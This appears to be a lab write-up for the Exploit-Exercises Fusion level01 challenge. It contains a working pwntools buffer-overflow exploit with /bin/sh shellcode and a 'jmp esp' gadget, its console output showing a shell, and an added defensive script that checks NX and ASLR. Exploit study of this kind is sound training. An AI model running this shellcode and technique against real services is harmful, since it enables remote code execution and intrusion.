
[Exploit-Exercise] Fusion level01

Fusion Level01

- NX is still disabled, but ASLR is now on.

- So we can no longer hardcode the buffer's stack address in the exploit.

- All you need is a 'jmp esp' gadget: after the overflow, esp points at the bytes that follow the return address, so returning into 'jmp esp' lands execution on the shellcode without knowing its address.
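The two mitigations this level hinges on can be checked before you ever look at a gadget. The following script is an added example for this writeup, not code from the original post or from Exploit-Exercises: it parses an ELF's PT_GNU_STACK program header to tell whether the stack is executable (the "NX" column of checksec) and classifies the kernel's randomize_va_space setting. Function names, and the minimal ELF32 image built by build_elf32() for the self-test, are my own constructions; the built image is just a header plus one program header and is not a loadable binary.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program-header type that records stack permissions
PF_X = 0x1                 # executable bit in p_flags


def stack_flags(elf):
    """Return p_flags of the PT_GNU_STACK segment, or None if the binary has none.

    Handles ELF32 and ELF64, little- or big-endian. A missing PT_GNU_STACK
    historically meant the loader fell back to an executable stack, so
    callers should treat None as 'not protected'.
    """
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = elf[4], elf[5]
    end = "<" if ei_data == 1 else ">"
    if ei_class == 1:                                   # ELFCLASS32
        (e_phoff,) = struct.unpack_from(end + "I", elf, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 42)
        flags_off = 24                                  # p_flags is the 7th dword of Elf32_Phdr
    elif ei_class == 2:                                 # ELFCLASS64
        (e_phoff,) = struct.unpack_from(end + "Q", elf, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 54)
        flags_off = 4                                   # p_flags follows p_type in Elf64_Phdr
    else:
        raise ValueError("unknown ELF class %d" % ei_class)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from(end + "I", elf, off)
        if p_type == PT_GNU_STACK:
            (p_flags,) = struct.unpack_from(end + "I", elf, off + flags_off)
            return p_flags
    return None


def nx_enabled(elf):
    """True only when PT_GNU_STACK exists and lacks the executable bit."""
    flags = stack_flags(elf)
    return flags is not None and not (flags & PF_X)


def aslr_mode(text):
    """Classify the contents of /proc/sys/kernel/randomize_va_space."""
    return {"0": "disabled", "1": "conservative", "2": "full"}.get(text.strip(), "unknown")


def system_aslr(path="/proc/sys/kernel/randomize_va_space"):
    """Read the live setting; returns 'unavailable' on non-Linux hosts."""
    try:
        with open(path) as f:
            return aslr_mode(f.read())
    except OSError:
        return "unavailable"


def build_elf32(gnu_stack_flags):
    """Constructed ELF32 image: 52-byte header plus a single PT_GNU_STACK phdr."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + b"\x00" * 9   # class32, LE, version 1
    header = ident + struct.pack(
        "<HHIIIIIHHHHHH",
        2,          # e_type   ET_EXEC
        3,          # e_machine EM_386
        1,          # e_version
        0x8048000,  # e_entry   (placeholder, never executed)
        52,         # e_phoff   program headers start right after the header
        0,          # e_shoff
        0,          # e_flags
        52,         # e_ehsize
        32,         # e_phentsize
        1,          # e_phnum
        0, 0, 0,    # e_shentsize, e_shnum, e_shstrndx
    )
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, gnu_stack_flags, 0x10)
    return header + phdr


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            data = f.read()
        print("NX:   %s" % ("enabled" if nx_enabled(data) else "DISABLED (executable stack)"))
    else:
        # Self-check on two constructed images: RWX stack vs RW stack.
        print("constructed RWX image -> NX enabled? %s" % nx_enabled(build_elf32(0x7)))
        print("constructed RW  image -> NX enabled? %s" % nx_enabled(build_elf32(0x6)))
    print("ASLR: %s" % system_aslr())
```

Run it with the level01 binary as argument to reproduce the "NX disabled, ASLR on" observation from the bullets; the combination of an executable stack and a randomized stack is exactly what makes a position-independent trampoline like 'jmp esp' sufficient, and flipping PT_GNU_STACK to RW (for example by linking without -z execstack) is the fix that removes it.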

from pwn import *

# dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/sh
sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"

s = remote('192.168.56.136', 20001)

jmp_esp = 0x8049f4f  # address of the 'jmp esp' gadget inside the binary (not randomized: no PIE)

payload = "GET "
payload += "A"*139          # padding up to the saved return address
payload += p32(jmp_esp)     # return into 'jmp esp'
payload += sc               # esp now points here, so the shellcode runs
payload += " HTTP/1.1"

s.send(payload)
s.interactive()

zero@ubuntu:~/Desktop$ python fusion.py
[+] Opening connection to 192.168.56.136 on port 20001: Done
[*] Switching to interactive mode
$ id
uid=20001 gid=20001 groups=20001
